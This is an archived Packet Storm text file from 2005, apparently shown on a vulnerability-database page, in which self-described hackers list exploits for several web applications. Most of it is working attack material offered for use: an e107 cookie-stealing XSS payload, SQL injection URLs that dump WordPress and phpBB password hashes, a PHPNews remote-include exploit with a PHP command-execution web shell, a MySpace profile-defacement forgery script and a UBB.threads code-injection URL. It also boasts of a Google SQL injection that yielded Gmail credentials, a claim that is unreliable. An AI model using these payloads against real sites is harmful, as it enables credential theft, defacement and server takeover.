Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

multiVulns.txt

🗓️ 31 Aug 2005 00:00:00Reported by pacificoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

*CMS/Forum Vulnerabilities Found by ap0c Hackers

Code
`#################################  
# Multi-CMS/Forum Vulnability's #  
# Found by ap0c hackers #  
# pacifico & ratboy #  
#################################  
  
Yo! Ok, well a couple new vulnabilitys have been found by.. us :)  
  
------------------  
First; e107 xss---  
------------------  
  
[link=http://w000000w00tw00t/asdadLI[link=  
onMouseOver='alert(document.cookie);' h1d3="]<[size=24]HIGHLIGHT  
ME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link]  
  
Enter this into any message, signature, et cetra, and when highlighted  
it will alert with the users cookie. This *may* be furtherly  
exploitable; but we are not sure; as we've been very busy ;)  
  
------  
next; wordpress blog sql injection ---  
------  
  
http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*  
  
This will give the administrator hash for the wordpress blog/CMS. We  
have also found that if you spoof you're browser to something like:  
<?php phpinfo(); ?>, and have a failed login attempt; it is eval'd,  
and you can execute your own code.  
  
------  
Now; PHPNews latest release remote include(); exploit  
------  
  
http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a  
  
Ok, now you'll need a host, and change (http://path/to/exploit/) to  
your host. Now, you will make a directory called "languages". Then in  
a file named "en_GB.admin.lng", put something like this code:  
  
<?php   
$rawr=$_GET['c'];  
echo(`$rawr`);  
?>  
  
kthx.  
  
  
-----  
And; Knoledge Base PHPBB Mod SQL Injection Exploit  
-----  
  
Righto.. so you find a phpbb forum that says: 'Powered by Knowledge  
Base MOD, wGEric & Haplo (c) 2002-2005' at the bottem, eh?  
  
Now, this is totally vulnable. (the mod changes the index.php to kb.php)  
http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00  
  
:)  
  
  
-----  
!!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!!  
-----  
  
Ok, we expect this to be fixed right away, so be sure to do it quick ;)  
Giving google the query:   
-b: *++*' UNION SELECT ass,ass from ASS,ass%00/*  
Cause's an error of "database gm-google.ass does not exist". We've  
gotten a few user/pass's for gmail with this ;)  
This is done by confusing googles "calculator", so it does *NOT* check  
the query to make sure its valid.  
  
You'd be suprised how insecure google is; when looked at closly. We  
also had a bindshell; but they found out; and thats fixed now.  
  
  
-----  
MySpace.com User Profile Defacement.  
-----  
  
Once again, this may be fixed very soon.  
This code should be efficent;  
  
<?php   
$g1=$_GET['t'];  
$g2=$_GET['f'];  
  
echo('  
<form action="http://myspace.com/index.cfm?fuseaction=user.addComment"  
method="post" name="commentForm">  
  
<input type="hidden" name="hashcode"  
value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a">  
<input type="hidden" name="FriendID" value="' . $f . '24822493">  
<input type=hidden name=Mytoken value=' . $t . '>  
  
');  
  
echo ('  
<input type="hidden" name="f_comments"  
value='%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E'>  
  
  
  
<input type="submit" value="Post Comment" onClick="this.disabled =  
true; document.commentForm.submit();">  
</form>  
');  
?>  
  
example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617  
  
This would deface profile 6617 if the (t) variable is that users friend.  
  
ktx.  
  
-----  
Forums ("UBB.threads™ 6.3.2") Remote Code Execution.  
-----  
  
These boards are very popular among corporate sites (*cough*NBC,CNN*cough*)  
http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post  
  
This would execute phpinfo(); on the victims server.  
  
##########################  
## Thats all for this ##  
## "issue" of sweet ##  
## sploits... sincerly ##  
## pacifico and ratboy ##  
##########################  
Contact? [email protected]  
  
-EOF-  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
e107 xsswordpress blog sqlphpnews remote includeknowledge base phpbb mod sqlgoogle.com sql injectionmyspace user profile defacement
29